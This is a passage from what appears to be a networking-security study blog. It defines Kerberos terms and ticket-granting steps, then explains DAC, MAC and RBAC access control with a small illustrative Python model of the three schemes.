4. Cross-realm authentication: the capability of users in one realm to be authenticated and access services in another realm. This is accomplished by the user’s realm registering a remote ticket-granting server (RTGS) in the realm of the service. Rather than having every realm authenticate with every other, cross-realm authentication can be configured in a hierarchical fashion.
5. Remote Ticket Granting Server: the TGS in a user’s realm registers with the remote TGS in order to enable the users to access services in remote realms.
6. Ticket: a ticket is a block of data that allows users to prove their identity to a service. Tickets are stored on the local system in a ticket cache, and each ticket carries a time stamp and a time limit of ten hours; limiting the lifetime of a ticket minimises the chance of an attacker obtaining a ticket and being able to use it for unauthorised access.
7. Ticket cache: a portion of memory which stores all of a user’s Kerberos tickets. It is separate from applications so that several applications can use the same ticket.
8. Ticket-Granting Ticket: a TGT is a ticket granted to a valid user by the AS in order to obtain tickets from the TGS; it is stored in the ticket cache.
9. Authenticators: a series of bits, a symbol, or a group of symbols inserted into a transmitted message in a predetermined manner and then used for validation. Authenticators are typically valid for 5 minutes.
10. Principal: a principal is any unique entity to which Kerberos can assign tickets.

Authentication
1. The user logs on and sends a registration request to the AS.
2. The AS authenticates the user and provides him with a TGT.

Ticket Granting Server
1. The user with a TGT requests a ticket from the TGS.
2. The user accesses the service using the ticket.

RTGS
1. The client requests a TGT for a remote realm through his TGS and is sent one.
2. Using that RTGT, the user can contact the RTGS and request a ticket to access the remote service.

Access Control

January 2, 2009 | Networking Security

MAC/DAC/RBAC

• Discretionary Access Control (DAC): the owner of an object manages access control at his own discretion, enforced through ACLs.
• Mandatory Access Control (MAC): access to an object is restricted based on the sensitivity of the object and granted through authorization to access that level of data.
• Role Based Access Control (RBAC): access is based on the role a user plays in the organization.
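The three models side by side, as an added example (not from the original post): DAC lets an owner share an object through its ACL, MAC overrides that by comparing the object's sensitivity label with the user's clearance, and RBAC decides from the roles the user holds. Users, labels and role permissions are constructed.

```python
from dataclasses import dataclass, field
from typing import Dict, Set

# Sensitivity levels for MAC, ordered low to high (constructed labels).
LEVELS = {"public": 0, "internal": 1, "confidential": 2, "secret": 3}

@dataclass
class Obj:
    name: str
    owner: str
    sensitivity: str                                   # MAC label on the object
    acl: Dict[str, Set[str]] = field(default_factory=dict)   # DAC: user -> {"read", "write"}

@dataclass
class User:
    name: str
    clearance: str                                     # MAC: highest level the user is authorised for
    roles: Set[str] = field(default_factory=set)       # RBAC: roles held in the organisation

ROLE_PERMISSIONS = {                                   # RBAC policy set by the organisation
    "analyst": {"read"},
    "editor": {"read", "write"},
}

def dac_grant(owner: User, obj: Obj, grantee: User, perms: Set[str]) -> None:
    """DAC: only the owner may change the ACL, at their own discretion."""
    if owner.name != obj.owner:
        raise PermissionError(f"{owner.name} does not own {obj.name}")
    obj.acl.setdefault(grantee.name, set()).update(perms)

def dac_allows(user: User, obj: Obj, action: str) -> bool:
    return user.name == obj.owner or action in obj.acl.get(user.name, set())

def mac_allows(user: User, obj: Obj) -> bool:
    """MAC: clearance must reach the object's sensitivity; an owner's ACL grant cannot override it."""
    return LEVELS[user.clearance] >= LEVELS[obj.sensitivity]

def rbac_allows(user: User, action: str) -> bool:
    return any(action in ROLE_PERMISSIONS.get(role, set()) for role in user.roles)

def authorise(user: User, obj: Obj, action: str, model: str) -> bool:
    """Evaluate one request under the chosen model."""
    if model == "DAC":
        return dac_allows(user, obj, action)
    if model == "MAC":
        return mac_allows(user, obj)
    if model == "RBAC":
        return rbac_allows(user, action)
    raise ValueError(model)

def build_scenario():
    """Owner shares a secret report with a lower-cleared colleague: DAC says yes, MAC says no."""
    alice = User("alice", "secret", {"editor"})
    bob = User("bob", "internal", {"analyst"})
    report = Obj("q3-report", owner="alice", sensitivity="secret")
    dac_grant(alice, report, bob, {"read"})
    return alice, bob, report
```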